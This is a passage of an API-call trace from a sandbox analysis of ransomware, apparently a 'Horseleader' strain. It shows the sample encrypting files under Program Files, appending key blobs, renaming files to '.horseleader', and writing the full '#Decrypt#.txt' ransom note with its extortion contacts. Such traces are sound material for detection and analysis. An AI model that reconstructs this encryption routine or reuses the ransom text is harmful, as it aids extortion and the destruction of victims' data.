lpNewFilePointer=0xffffffff) returned 1 [0247.003] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x223, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x223, lpOverlapped=0x0) returned 1 [0247.003] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.003] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, 
lpOverlapped=0x0) returned 1 [0247.003] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.003] CloseHandle (hObject=0x1a4) returned 1 [0247.003] GetProcessHeap () returned 0x780000 [0247.004] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.004] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF.horseleader") returned 93 [0247.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.inf.horseleader")) returned 1 [0247.083] GetProcessHeap () returned 0x780000 [0247.083] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.083] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x54a, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.083] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.083] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 80 [0247.083] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.083] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.083] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.083] lstrlenW (lpString=".testttjffg") returned 11 [0247.083] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.084] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.084] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.084] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.084] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 80 [0247.084] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.084] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1354) returned 1 [0247.084] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x54a, lpOverlapped=0x0) returned 1 [0247.090] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffab6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0247.091] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x54a, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x54a, lpOverlapped=0x0) returned 1 [0247.091] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.091] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.091] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.091] CloseHandle (hObject=0x1a4) returned 1 [0247.092] GetProcessHeap () returned 0x780000 [0247.092] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.092] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.horseleader") returned 92 [0247.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.horseleader")) returned 1 [0247.093] GetProcessHeap () returned 0x780000 [0247.093] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.093] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7eb1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.093] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.093] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 81 [0247.094] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.094] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.094] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.094] lstrlenW (lpString=".testttjffg") returned 11 [0247.094] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.094] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.094] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.094] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.095] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 81 [0247.095] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.095] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=32433) returned 1 [0247.095] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.098] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.098] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.098] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2eb1, lpOverlapped=0x0) returned 1 [0247.098] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd14f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.099] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2eb1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2eb1, lpOverlapped=0x0) returned 1 [0247.099] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.099] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.099] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, 
lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.099] CloseHandle (hObject=0x1a4) returned 1 [0247.100] GetProcessHeap () returned 0x780000 [0247.100] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.100] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.horseleader") returned 93 [0247.100] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.horseleader")) returned 1 [0247.101] GetProcessHeap () returned 0x780000 [0247.101] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.101] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7eb1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.101] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.101] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\#Decrypt#.txt") returned 82 [0247.101] 
CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.101] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.102] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.103] lstrlenA (lpString="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") returned 1368 [0247.103] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.103] CloseHandle (hObject=0x158) returned 1 [0247.103] GetProcessHeap () returned 0x780000 [0247.103] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.103] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60af2a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EXPEDITN", cAlternateFileName="")) returned 1 [0247.103] lstrcmpiW (lpString1="EXPEDITN", lpString2="Windows") returned -1 [0247.103] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN") returned 68 [0247.103] lstrcmpW (lpString1="EXPEDITN", lpString2=".") returned 1 [0247.103] lstrcmpW (lpString1="EXPEDITN", lpString2="..") returned 1 [0247.103] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.103] GetProcessHeap () returned 0x780000 [0247.104] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0247.104] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\*") returned 70 [0247.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60af2a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.104] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.104] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\.") returned 70 [0247.104] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.104] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60af2a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.104] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.104] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\..") returned 71 [0247.104] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0247.104] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.104] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd690500, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfd690500, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x19539, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="EXPEDITN.ELM", cAlternateFileName="")) returned 1 [0247.104] lstrcmpiW (lpString1="EXPEDITN.ELM", lpString2="Windows") returned -1 [0247.104] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM") returned 81 [0247.105] StrStrIW (lpFirst="EXPEDITN.ELM", lpSrch=".horseleader") returned 0x0 [0247.105] lstrcmpW (lpString1="EXPEDITN.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.105] lstrcmpW (lpString1="EXPEDITN.ELM", lpString2="_uninstalling_.png") returned 1 [0247.105] lstrlenW (lpString=".testttjffg") returned 11 [0247.105] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM", lpSrch=".testttjffg") returned 0x0 [0247.105] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.105] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.105] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM") returned 81 [0247.105] StrStrW (lpFirst="EXPEDITN.ELM", lpSrch=".txt") returned 0x0 [0247.106] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=103737) returned 1 [0247.106] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.106] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.108] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.108] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.109] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa29c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.109] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.109] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.109] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.110] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x14539, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.110] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.110] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.110] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.110] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.110] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.111] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.111] CloseHandle (hObject=0x1a4) returned 1 [0247.111] GetProcessHeap () returned 0x780000 [0247.111] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.111] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM.horseleader") returned 93 [0247.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM" (normalized: "c:\\program files\\common files\\microsoft 
